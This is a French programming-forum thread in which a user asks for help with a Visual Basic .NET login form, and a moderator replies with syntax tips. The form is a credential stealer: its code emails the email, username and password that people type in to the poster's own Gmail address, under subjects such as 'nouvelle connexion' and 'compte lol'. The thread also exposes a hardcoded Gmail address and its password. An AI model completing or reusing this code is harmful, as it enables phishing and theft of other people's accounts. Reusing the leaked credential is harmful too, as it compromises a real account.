Problème de codage microsoft visual basic

Résolu/Fermé
fragcodeur Messages postés 19 Date d'inscription dimanche 15 juin 2014 Statut Membre Dernière intervention 13 juin 2017 - 15 juin 2014 à 22:47
fragcodeur Messages postés 19 Date d'inscription dimanche 15 juin 2014 Statut Membre Dernière intervention 13 juin 2017 - 16 juin 2014 à 16:18
bonsoir, je fais un petit logiciel sympa.le design de l'application est fait mais , je n'arrive pas à trouver le code permettant de recevoir par mail les information de connexion que les gens ont utilisé.

par exemple : je me connecte à ce logiciel , je rentre mon email:test@test.com je rentre mon identifiant : fragcodeur et je rentre enfin mon mot de passe : jemaime.

maintenant j'aimerais recevoir ces informations de connexion sur MON adresse email.
j'ai reussi a faire en sorte de recevoir un mail mais n'arrive pas a recevoir les informations.


voici mon codage:

Imports System.Net.Mail

Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim nom = tbnom
Dim pass = tbpass
Dim mail = tbmail



CEST ICI QUE JAIMERAIS METTRE MON CODE POUR RECEVOIR MOT DE PASSE MAIL ET IDENTIFIANTS.



Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.gmail.com")

MyMailMessage.From = New MailAddress("fragmenteurlol@gmail.com")
MyMailMessage.To.Add("fragmenteurlol@gmail.com")
MyMailMessage.Subject = ("nouvelle connexion")
MyMailMessage.Body = ("message")

SMTPServer.Port = ("587") 'Port
SMTPServer.Credentials = New System.Net.NetworkCredential("fragmenteurlol@gmail.com", "ferrari458JW")
SMTPServer.EnableSsl = True

SMTPServer.Send(MyMailMessage) 'Envoi

End Sub
End Class
A voir également:

1 réponse

pijaku Messages postés 12263 Date d'inscription jeudi 15 mai 2008 Statut Modérateur Dernière intervention 4 janvier 2024 2 744
16 juin 2014 à 08:34
Bonjour,

Tu dis :
j'ai reussi a faire en sorte de recevoir un mail mais n'arrive pas a recevoir les informations.
Qu'y a t'il d'écrit dans le mail que tu as réussis à recevoir?
0
Je reçois comme message : "message". Voici par quel code je reçoit ça : MyMailMessage.Body = ("message")
0
fragcodeur Messages postés 19 Date d'inscription dimanche 15 juin 2014 Statut Membre Dernière intervention 13 juin 2017
16 juin 2014 à 13:55
enfaite j'ai trouver la commande pour recevoir les informations:
   Dim Message As String = "nom : " & nom & vbNewLine & "pass : " & pass & vbNewLine & "mail : " & mail


Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.gmail.com")

MyMailMessage.From = New MailAddress("fragmenteurlol@gmail.com")
MyMailMessage.To.Add("fragmenteurlol@gmail.com")
MyMailMessage.Subject = ("nouvelle connexion")
MyMailMessage.Body = ("Message")

c'est la première ligne qui pose problème. le logiciel me dit : l'operateur '&' n'est pas defini pour les types 'strings'.
0
fragcodeur Messages postés 19 Date d'inscription dimanche 15 juin 2014 Statut Membre Dernière intervention 13 juin 2017
16 juin 2014 à 14:02
j'ai essayer ca mais meme problème:
            Dim nom = tbnom
Dim pass = tbpass
Dim mail = tbmail


Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.gmail.com")

MyMailMessage.From = New MailAddress("fragmenteurlol@gmail.com")
MyMailMessage.To.Add("fragmenteurlol@gmail.com")
MyMailMessage.Subject = ("compte lol")
MyMailMessage.Body = ("nom : " & nom & vbNewLine & "pass : " & pass & vbNewLine & "mail : " & mail)

SMTPServer.Port = ("587") 'Port
SMTPServer.Credentials = New System.Net.NetworkCredential("fragmenteurlol@gmail.com", "ferrari458JW")
SMTPServer.EnableSsl = True
0
pijaku Messages postés 12263 Date d'inscription jeudi 15 mai 2008 Statut Modérateur Dernière intervention 4 janvier 2024 2 744
16 juin 2014 à 14:26
déjà, tu as bien avancé.
Essaye + au lieu de &
0
fragcodeur Messages postés 19 Date d'inscription dimanche 15 juin 2014 Statut Membre Dernière intervention 13 juin 2017
16 juin 2014 à 15:13
j'avais deja essayée meme probleme
0